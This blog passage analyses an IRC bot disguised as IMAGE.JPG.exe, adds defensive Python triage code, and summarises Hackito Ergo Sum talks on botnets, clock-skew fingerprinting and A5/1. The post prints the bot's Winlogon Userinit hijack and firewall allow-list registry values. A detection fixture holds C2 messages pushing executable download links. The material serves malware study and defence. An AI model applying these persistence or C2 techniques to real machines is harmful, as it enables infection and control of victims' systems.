</div><div style="text-align: justify;"></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglIn-_3thcLCv6gZ1mDhNNlEcg7ga1yvnuwqlCsaTHEITs1XGKbVlPHoLYcty-_5Bz_4Rf7K97qUbIjApaLwko1jyJIb_CgsmS0IBzjkM_z2GUw-T4DNCZIwZpwyIYvJTt-tdW2ojmPPYl/s1600/ubuntu_windir.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglIn-_3thcLCv6gZ1mDhNNlEcg7ga1yvnuwqlCsaTHEITs1XGKbVlPHoLYcty-_5Bz_4Rf7K97qUbIjApaLwko1jyJIb_CgsmS0IBzjkM_z2GUw-T4DNCZIwZpwyIYvJTt-tdW2ojmPPYl/s400/ubuntu_windir.png" width="400" /></a></div><br />
</div><div style="text-align: justify;">Ce malware utilise des techniques de dissimulation semblables à celles utilisées par les rootkits afin de se cacher dans le système de fichiers, cependant il est visible dans la liste des processus en cours (ex : Gestionnaire des tâches).</div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Le fichier secfil.exe est exactement le même que IMAGE.JPG.exe, car ce dernier lors de sa première exécution s'est auto-copié dans C:\WINDOWS afin que le système victime soit toujours infecté après la suppression du fichier original.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;">2.2 - In the Windows registry</span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">In the Windows registry, the malware allow-lists itself in the Windows firewall by adding these values:</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe: "C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe:*:Enabled:Userinit"</span></i></div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </i><i><span class="Apple-style-span" style="font-family: inherit;"> </span></i></div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe: "C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe:*:Enabled:Userinit"</span></i></div></div><div><div style="text-align: left;"></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">Decoding this: the malware allows itself to reach any machine on the local network and on the Internet (*), the rule is enabled in the firewall (Enabled) and its name is "Userinit", borrowed from a legitimate Windows component so that it blends in.</span></div></div><div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvZagNHe-Kp-RZN9g6WAMRztgJyh9BxkQ6tm_6ZDLNL0XGZjYgahyphenhyphen9X99ke1aOSrO2GHRGmNZFFfju6D8UiRprj_OkIWvVYpT_MnQo3jo7pO9Zr-78u99u5F-Z_M3gUtdredVmVTASJiv/s1600/FW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvZagNHe-Kp-RZN9g6WAMRztgJyh9BxkQ6tm_6ZDLNL0XGZjYgahyphenhyphen9X99ke1aOSrO2GHRGmNZFFfju6D8UiRprj_OkIWvVYpT_MnQo3jo7pO9Zr-78u99u5F-Z_M3gUtdredVmVTASJiv/s320/FW.png" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">It also modifies a registry value so as to be executed at Windows logon (before explorer.exe), by appending itself to the Winlogon Userinit value:</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: left;"><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\secfil.exe"</span></i></div></div><div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
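Both changes above can be triaged straight from a Regshot diff, without opening regedit. The following Python is an added example, not code from this post: it runs over a Regshot-style report constructed from the two values quoted above (plus a benign ctfmon.exe Run entry added as a control) and flags a Userinit value containing anything other than userinit.exe, a firewall allow-list entry for an executable outside C:\Windows or Program Files, and a double-extension file name such as IMAGE.JPG.exe. The "trusted directories" list and the extension lists are the example's own assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in Regshot's report style. The firewall and Userinit lines are
# the values quoted above; the ctfmon.exe Run entry is a benign control added to
# show what is not flagged. Regshot prints a modified value twice (before, after).
REGSHOT_DIFF = r"""
----------------------------------
Values added: 2
----------------------------------
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe: "C:\Documents and Settings\Administrateur\Bureau\IMAGE.JPG.exe:*:Enabled:Userinit"
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe: "C:\WINDOWS\system32\ctfmon.exe"

----------------------------------
Values modified: 1
----------------------------------
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: "C:\WINDOWS\system32\userinit.exe,"
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\secfil.exe"
"""

VALUE_RE = re.compile(r'^(HK[A-Z_]+\\[^"]+?): "(.*)"$')
FW_LIST = "\\firewallpolicy\\standardprofile\\authorizedapplications\\list\\"
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\")        # assumption for this example
# "photo.jpg.exe" style names: an image/document extension followed by an executable one
DOUBLE_EXT = re.compile(r"\.(jpe?g|gif|png|bmp|doc|pdf|txt)\.(exe|scr|com|pif|bat)$", re.IGNORECASE)


def parse_values(report: str) -> List[Tuple[str, str]]:
    """(registry path, data) for every value line; separators and section headers are skipped."""
    pairs = []
    for line in report.splitlines():
        m = VALUE_RE.match(line.strip())
        if m:
            pairs.append((m.group(1), m.group(2)))
    return pairs


def userinit_extras(data: str) -> List[str]:
    """Entries in Winlogon\\Userinit other than the legitimate userinit.exe (normally the only one)."""
    entries = [e.strip() for e in data.split(",") if e.strip()]
    return [e for e in entries if not e.lower().endswith("\\system32\\userinit.exe")]


def parse_fw_entry(data: str) -> Dict[str, str]:
    """'path:scope:state:name' split from the right, because the path itself contains 'C:'."""
    path, scope, state, name = data.rsplit(":", 3)
    return {"path": path, "scope": scope, "state": state, "name": name}


def is_trusted_path(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


def triage(report: str) -> List[Dict[str, str]]:
    """Findings in report order; an empty list means nothing suspicious in the diff."""
    findings = []
    for reg_path, data in parse_values(report):
        low = reg_path.lower()
        if low.endswith("\\winlogon\\userinit"):
            for extra in userinit_extras(data):
                findings.append({"rule": "userinit_hijack", "detail": extra})
        elif FW_LIST in low:
            fw = parse_fw_entry(data)
            exe = fw["path"].rsplit("\\", 1)[-1]
            if not is_trusted_path(fw["path"]):
                findings.append({"rule": "fw_allow_untrusted_path",
                                 "detail": f"{fw['path']} scope={fw['scope']} {fw['state']} name={fw['name']}"})
            if DOUBLE_EXT.search(exe):
                findings.append({"rule": "double_extension", "detail": exe})
        elif "\\currentversion\\run\\" in low:
            exe_path = data.lstrip('"').split('"')[0].strip()
            if not is_trusted_path(exe_path):
                findings.append({"rule": "run_key_untrusted_path", "detail": data})
    return findings


if __name__ == "__main__":
    for f in triage(REGSHOT_DIFF):
        print(f"[{f['rule']}] {f['detail']}")
```

The Userinit check is deliberately strict: on a stock Windows XP the value holds only userinit.exe followed by a trailing comma, so any second entry is worth a look even when, as here, it lives under C:\WINDOWS.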
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;">2.3 - But how does it communicate?</span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">By analysing the outgoing packets with Wireshark, I could see that at my VM's startup the malware connects to an IRC server through which the botmaster gives orders to all the bots, my VM included. The malware does not always connect to the same IRC server; I found 3 (domain names anonymised):</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">- 2.nomdedomaine.com (located in the United Kingdom, registered on 22-03-2010)</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">- irc.nomdedomaine0.com (located in Chicago, USA)</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">- irc.nomdedomaine000.com (located in Serbia and Montenegro)</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">The same goes for the destination port, which is either 1234 or 1241.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSN5vvyjpVBx0WyQuRMIVCXXncDC-Mtn5B2CC-bhvZCd_Cii2wkQmYpDNjDvwa6F_SG6XFiTfBAzpGZDr2kVTX_B3pr-u8ZfUonPXiEFgG6pjgXM4hMo_T25-n4MhGixmoCRneCeG3Jik/s1600/network1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTSN5vvyjpVBx0WyQuRMIVCXXncDC-Mtn5B2CC-bhvZCd_Cii2wkQmYpDNjDvwa6F_SG6XFiTfBAzpGZDr2kVTX_B3pr-u8ZfUonPXiEFgG6pjgXM4hMo_T25-n4MhGixmoCRneCeG3Jik/s320/network1.png" /></span></a></div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">On some of the IRC servers it connects to, an authentication step has been set up with the IRC "</span><i><span class="Apple-style-span" style="font-family: inherit;">PASS</span></i><span class="Apple-style-span" style="font-family: inherit;">" command. The malware then picks a nickname of the form [COUNTRY_CODE|OS_CODE]RANDOM_NUMBER; in my case one of the nicknames was </span><i><span class="Apple-style-span" style="font-family: inherit;">[FRA|XP]5531626</span></i><span class="Apple-style-span" style="font-family: inherit;">, and it joins the "</span><i><span class="Apple-style-span" style="font-family: inherit;">#dl#</span></i><span class="Apple-style-span" style="font-family: inherit;">" channel. Next, the malware repeatedly receives private messages (PRIVMSG) sent by various nicknames (botmasters), one of them fi2ani, containing links to other executable files hosted on servers in Germany and in the United States (Saint Louis and Chicago). </span></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIHSdD_6lmxTTeSdKe3S-FS3j95Ba5-T74-8jC6YdwaTueBnsV8lGVwH4Rv1Rc6JkH43BjZVKgNOKreXM43Sb_POVgcp079sBV-IPKVgPL7yBKpEdNUiB9v8ct3zWtv9a5RmPhHVonrtbl/s1600/network2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: inherit;"><img border="0" height="19" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIHSdD_6lmxTTeSdKe3S-FS3j95Ba5-T74-8jC6YdwaTueBnsV8lGVwH4Rv1Rc6JkH43BjZVKgNOKreXM43Sb_POVgcp079sBV-IPKVgPL7yBKpEdNUiB9v8ct3zWtv9a5RmPhHVonrtbl/s640/network2.png" width="640" /></span></a></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">One of the links triggers the download of an executable hosted on a web server; once saved in the local account's temporary-files directory, it runs and starts using my VM in turn. In particular, it connects to a second IRC command-and-control server (irc.nomdedomaine00.com, again located in Chicago) and downloads further executables. It too modifies the registry to authorise itself in the firewall and to start at boot, by adding a value under the following registry key: </span><i><span class="Apple-style-span" style="font-family: inherit;">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span></i><span class="Apple-style-span" style="font-family: inherit;">.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
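As an added example (not from the original post), here is a Python triage routine for an IRC session reconstructed from a capture, in the spirit of the Wireshark analysis above. It looks for the indicators just described: a server password (PASS), a nickname of the form [COUNTRY|OS]NUMBER, the channel join, executable download links pushed over PRIVMSG, and IRC on a non-standard port. The session below is constructed for the example; the server names reuse the post's placeholders, and the password, IP addresses and URLs are invented.

```python
import re
from typing import Dict, List, Optional, Tuple

# Nicknames such as [FRA|XP]5531626: country code, OS tag, random number.
BOT_NICK_RE = re.compile(r"^\[[A-Z]{2,3}\|[A-Za-z0-9]+\]\d+$")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".dll")
IRC_PORTS = {6667, 6697}  # conventional plain and TLS IRC ports

# Constructed sample session (placeholder hostnames, invented password,
# RFC 5737 documentation addresses), modelled on the behaviour observed above.
SAMPLE_SESSION = {
    "server": "irc.nomdedomaine0.com",
    "dport": 1234,
    "lines": [
        "PASS s3cret",
        "NICK [FRA|XP]5531626",
        "USER xp 0 * :xp",
        ":irc.nomdedomaine0.com 001 [FRA|XP]5531626 :Welcome",
        "JOIN #dl#",
        ":fi2ani!ops@203.0.113.7 PRIVMSG [FRA|XP]5531626 :http://203.0.113.7/files/update.exe",
        ":fi2ani!ops@203.0.113.7 PRIVMSG #dl# :http://198.51.100.9/a/b.exe 1",
        "PING :irc.nomdedomaine0.com",
    ],
}


def parse_irc_line(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one IRC line into (prefix, COMMAND, params); the trailing ':' param is included."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    command, params = parts[0].upper(), parts[1:]
    if sep:
        params.append(trailing)
    return prefix, command, params


def analyse_session(session: Dict) -> Dict:
    """Score an IRC session for bot-like behaviour and return the evidence."""
    indicators: List[str] = []
    nick, channels, urls = None, [], []
    for raw in session["lines"]:
        _, command, params = parse_irc_line(raw)
        if command == "PASS":
            indicators.append("server password (PASS) sent")
        elif command == "NICK" and params:
            nick = params[0]
            if BOT_NICK_RE.match(nick):
                indicators.append(f"bot-style nickname {nick}")
        elif command == "JOIN" and params:
            channels.append(params[0])
        elif command == "PRIVMSG" and len(params) >= 2:
            urls.extend(u for u in URL_RE.findall(params[1]) if u.lower().endswith(EXEC_EXT))
    if urls:
        indicators.append(f"{len(urls)} executable download link(s) pushed over PRIVMSG")
    if session["dport"] not in IRC_PORTS:
        indicators.append(f"IRC on non-standard port {session['dport']}")
    return {
        "server": session["server"],
        "nick": nick,
        "channels": channels,
        "urls": urls,
        "indicators": indicators,
        # Three independent indicators is an assumed triage threshold; tune it to your traffic.
        "verdict": "likely IRC bot C2" if len(indicators) >= 3 else "inconclusive",
    }


if __name__ == "__main__":
    report = analyse_session(SAMPLE_SESSION)
    print(report["verdict"], "on", report["server"])
    for ind in report["indicators"]:
        print(" -", ind)
```

Feed it the text of a "Follow TCP stream" export split into lines, one session per connection; a normal IRC user (standard port, human nickname, no PASS, no executable links) scores no indicators.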
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">3 - Remarks</span></span></b></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">I submitted this malware to VirusTotal to get an overview of which antivirus engines recognise the file as malicious, and to my great surprise only 10 of the 41 engines tested flag the file as a potential threat. As of today, AntiVir, Avast, BitDefender, ClamAV, DrWeb, GData, Kaspersky, McAfee, Microsoft, Symantec and TrendMicro do not detect this malware, even though they hold a large share of the antivirus market, which is rather worrying. A link to the VirusTotal report is given at the end of the article.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">One thing I did not understand is why the firewall authorisation is granted to IMAGE.JPG.exe (the file the user runs) when, at every startup, it is secfil.exe that is automatically executed. Moreover, when I restore the firewall's default settings (so IMAGE.JPG.exe no longer has an authorisation), communication between secfil.exe and the various IRC servers is still possible. (Note that the Windows XP firewall only filters inbound connections, so an outbound IRC connection never needs an exception; the rule would only matter if the bot had to accept inbound connections.) If you have answers to these questions, please leave a comment; I would be very grateful. </span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><b><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-size: x-large;">4 - Conclusion</span></span></b></div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">What to take away from this behavioural analysis is that cybercriminals (I prefer this word to "pirates", because it is clearer to everyone) use tricks to trap users who, if they are not aware of the risks they face on the Internet, are very easy prey. Here, the use of social engineering to spread "<i>bot</i>"-type malware is a good example. Moreover, the number of servers used and their geographic spread show how organised these cybercriminals are. During this analysis phase, I did not observe any propagation activity by the malware running in my virtual machine. The next steps will (perhaps) be an analysis of the code, to better understand how it works and uncover the techniques used by its developers, and an analysis of one of the files downloaded by the malware.</span></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div></div><div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: inherit;">VirusTotal analysis of 04/05/2010: </span><a class="vt-p" href="https://www.virustotal.com/analisis/5774689e29587e93094240532a28c2e39b508ad2238af793427badb8a8daedd7-1272983215"><span class="Apple-style-span" style="font-family: inherit;">https://www.virustotal.com/analisis/5774689e29587e93094240532a28c2e39b508ad2238af793427badb8a8daedd7-1272983215</span></a></div></div><div><div style="text-align: left;"><span class="Apple-style-span" style="font-family: inherit;">Regshot: </span><a class="vt-p" href="http://sourceforge.net/projects/regshot/"><span class="Apple-style-span" style="font-family: inherit;">http://sourceforge.net/projects/regshot/</span></a></div></div><div><div style="text-align: justify;"><span class="Apple-style-span" style="font-family: inherit;">IP geolocation: </span><a class="vt-p" href="http://www.ip2location.com/"><span class="Apple-style-span" style="font-family: inherit;">http://www.ip2location.com/</span></a></div></div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div><span class="Apple-style-span" style="font-family: inherit;"><br />
</span> </div><div><span class="Apple-style-span" style="font-family: inherit;">Video on the same topic (in English):</span></div><div><span class="Apple-style-span" style="font-family: inherit;"></span><br />
<a class="vt-p" href="http://vimeo.com/9474345"><span class="Apple-style-span" style="font-family: inherit;">Introduction to Malware Analysis</span></a><span class="Apple-style-span" style="font-family: inherit;"> from </span><a class="vt-p" href="http://vimeo.com/sansinstitute"><span class="Apple-style-span" style="font-family: inherit;">SANS Institute</span></a><span class="Apple-style-span" style="font-family: inherit;"> on </span><a class="vt-p" href="http://vimeo.com/"><span class="Apple-style-span" style="font-family: inherit;">Vimeo</span></a><span class="Apple-style-span" style="font-family: inherit;">.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-7082913599474591862010-04-16T21:52:00.003+02:002010-12-16T16:29:23.019+01:00Hackito Ergo Sum, Day 3<div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="140" src="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" width="200" /></a></div>The last day of HES began with a talk on the <b>new generation of botnets</b>, presented by <b>Itzik Kotler</b> and <b>Ziv Gadot</b> from Radware. According to them, botnets have introduced many technologies, which is one reason they are worth studying; of course, botnets also reuse technologies invented by researchers and others. Botnet masters use different kinds of protocols to communicate with their botnets: HTTP (Twitter...), IRC or a P2P network architecture, for example. Conficker illustrates this: its first three variants (A, B, C) relied on HTTP and randomly generated domain names, while the last ones (D, E) moved to a more flexible channel, P2P.</div><div style="text-align: justify;">One thing a botnet master wants is a botnet that is SPOF (Single Point Of Failure) resilient. 
Using protocols such as HTTP lets botnet traffic blend into ordinary traffic, which passes organisational security policies, works behind NAT and minimises the network footprint.</div><div style="text-align: justify;">Their goal was to build a blended botnet with SPOF resilience, so they looked for communication channels meeting these criteria:</div><div style="text-align: justify;">- Internet clipboard, e.g. pastebin.com</div><div style="text-align: justify;">- Disposable E-mail Address (DEA)</div><div style="text-align: justify;">- User generated content, e.g. comments on cnn.com</div><div style="text-align: justify;">- URL shortening, e.g. tinyurl.com</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">They introduced the "room concept", which corresponds to the communication channel. A private room can be used to talk to a single bot, which amounts to a unicast message. Negotiating the room between the bot and the botmaster takes four steps; I advise you to look at the slides, where it is very well explained. Their proof of concept is written in Python and is called Turbot (the name has nothing to do with the speed of their botnet, which is quite slow at the moment). We did not get a demonstration of the PoC because of a network problem at the conference. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FTurbot-A-Next-Generation-Botnet1.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"> After the lunch, <b>Renaud Lifchitz</b> has started the afternoon with a very interesting talk which was the first in french (2 others will follow). First, I will define "clock-skewing". This is a little clock variation in comparison to a reference clock. The aim is to create a footprint from clock-skewing (because all clock are different), so the measure precision is very important.<br />
A computer has 2 clocks :<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>- hardware clock (Real Time Clock)<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>- software/system clock managed by the OS</div><div style="text-align: justify;">Here, it's the second clock which is interesting. To measure clock-skewing, Renaud takes an interest in NTP protocol which contact atomic clock using UDP on port 123. According to the time difference between the atomic clock and the system clock, NTP will increase or slow down clock rate to put right the time (if time changements will be curt, some processes could be disturbed). NTP is the most precise method to measure time, but it's also possible by sniffing packets or by sending ICMP Timestamp request (Type 13, Code 0) and answer is ICMP Timestamp reply (Type 14) wich return number of millisecond after midnight. So Renaud has chosen NTP for its precision.<br />
These are the steps to fingerprint a machine:<br />
- every 5 seconds, synchronise your own clock with an NTP server and record the victim's timestamp<br />
- after 1 or 2 minutes you obtain a precise fingerprint (the average skew).<br />
<br />
<div style="text-align: center;"><i>"the less accurate the victim's clock, the more precise the fingerprint"</i></div><div style="text-align: center;"><br />
</div>This method can be used to identify stolen hardware on a LAN (it still works if the IP address, MAC address and hard drive have changed, but not if the operating system has changed), to detect virtual machines (VMs may all share the host machine's clock)... It has drawbacks, though: it is imprecise over the Internet, and results are affected by network latency, temperature variation, altitude and the victim's activity. To protect yourself against this fingerprinting method, you can synchronise your clock often (every 5-10 seconds) and disable TCP/ICMP timestamp requests/replies. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010-RLIFCHITZ-FINGERPRINTINGCLOCKSKEWING.pdf">[Slides]</a><br />
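As an added example (mine, not the speaker's code), the measurement procedure above reduces to a linear regression: record pairs of (reference time, victim timestamp), and the slope of the victim's offset against reference time is the skew. The Python below simulates a victim whose clock drifts at a known rate, with NTP-grade measurement noise, and recovers the skew in parts per million from two minutes of samples taken every five seconds. The victim readings are synthetic, and the 1 ppm matching tolerance is an assumption, not a figure from the talk.

```python
import random
from typing import List, Tuple

Sample = Tuple[float, float]  # (reference_time, victim_timestamp), both in seconds


def estimate_skew(samples: List[Sample]) -> Tuple[float, float]:
    """Least-squares fit of offset = victim - reference against reference time.
    Returns (skew in ppm, offset in seconds at the first sample)."""
    n = len(samples)
    if n < 2:
        raise ValueError("need at least two samples")
    t0 = samples[0][0]
    xs = [t - t0 for t, _ in samples]
    ys = [v - t for t, v in samples]
    mx, my = sum(xs) / n, sum(ys) / n
    sxx = sum((x - mx) ** 2 for x in xs)
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    slope = sxy / sxx            # seconds of drift per second of reference time
    return slope * 1e6, my - slope * mx


def simulate_victim(skew_ppm: float, offset: float, interval: float = 5.0,
                    duration: float = 120.0, noise_s: float = 1e-4,
                    seed: int = 1) -> List[Sample]:
    """Synthetic victim: its clock runs (1 + skew) times too fast and starts
    'offset' seconds ahead; every reading carries Gaussian measurement noise
    (0.1 ms by default, roughly what NTP on a LAN achieves)."""
    rng = random.Random(seed)
    samples = []
    for i in range(int(duration // interval) + 1):
        t = i * interval
        samples.append((t, offset + t * (1.0 + skew_ppm / 1e6) + rng.gauss(0.0, noise_s)))
    return samples


def same_machine(skew_a_ppm: float, skew_b_ppm: float, tolerance_ppm: float = 1.0) -> bool:
    """Fingerprint comparison: two measurements match if their skews agree within tolerance."""
    return abs(skew_a_ppm - skew_b_ppm) <= tolerance_ppm


if __name__ == "__main__":
    laptop = simulate_victim(skew_ppm=50.0, offset=3.2)
    desktop = simulate_victim(skew_ppm=-20.0, offset=3.2, seed=2)
    s1, _ = estimate_skew(laptop)
    s2, _ = estimate_skew(desktop)
    print(f"laptop skew ~ {s1:.1f} ppm, desktop skew ~ {s2:.1f} ppm, "
          f"same machine? {same_machine(s1, s2)}")
```

The offset (the constant part) is useless as a fingerprint since it changes whenever the victim resyncs; only the slope survives. With 0.1 ms noise and 25 samples the slope is recovered to well under 1 ppm, which is why the talk insists on measurement precision: with millisecond-level noise (ICMP timestamps over the Internet) the same two minutes would not separate two machines whose skews differ by a few ppm.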
<br />
<br />
<br />
This talk was followed by another one in French, "<b>A5/1 application &amp; crack via GPU</b>", presented by <b>Gloire Gwendal</b> (Kalkulator’s Knights Project). He presented the A5 cipher family:<br />
- A5/1 <a class="vt-p" href="http://en.wikipedia.org/wiki/A5/1">http://en.wikipedia.org/wiki/A5/1</a><br />
- A5/2 <a class="vt-p" href="http://en.wikipedia.org/wiki/A5/2">http://en.wikipedia.org/wiki/A5/2</a><br />
- A5/3 <a class="vt-p" href="http://en.wikipedia.org/wiki/A5/3">http://en.wikipedia.org/wiki/A5/3</a><br />
A5/1 is a weak stream cipher that uses a 64-bit key in theory (54 bits in practice, since 10 key bits are fixed to zero). Because of this weakness, many researchers have attacked A5/1:<br />
- 1997: first attack, reducing the complexity of A5/1<br />
- 1999: publication of the A5/1 design, recovered by reverse engineering<br />
- 2000: further complexity reductions<br />
- 2003-2004: attacks on the key<br />
- December 2009: Karsten Nohl announced his attack at the Chaos Communication Congress, a rainbow-table attack that runs in about 30 minutes. A demonstration is planned for August 2010.<br />
According to the speaker, there is little risk of seeing practical attacks on A5/1 in the near future, because enormous computing power is needed (GPU cluster, FPGA cluster...) and generating the rainbow tables takes months. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FCracking-A5-1-with-GPGPU_eng.pdf">[Slides]</a><br />
<br />
<br />
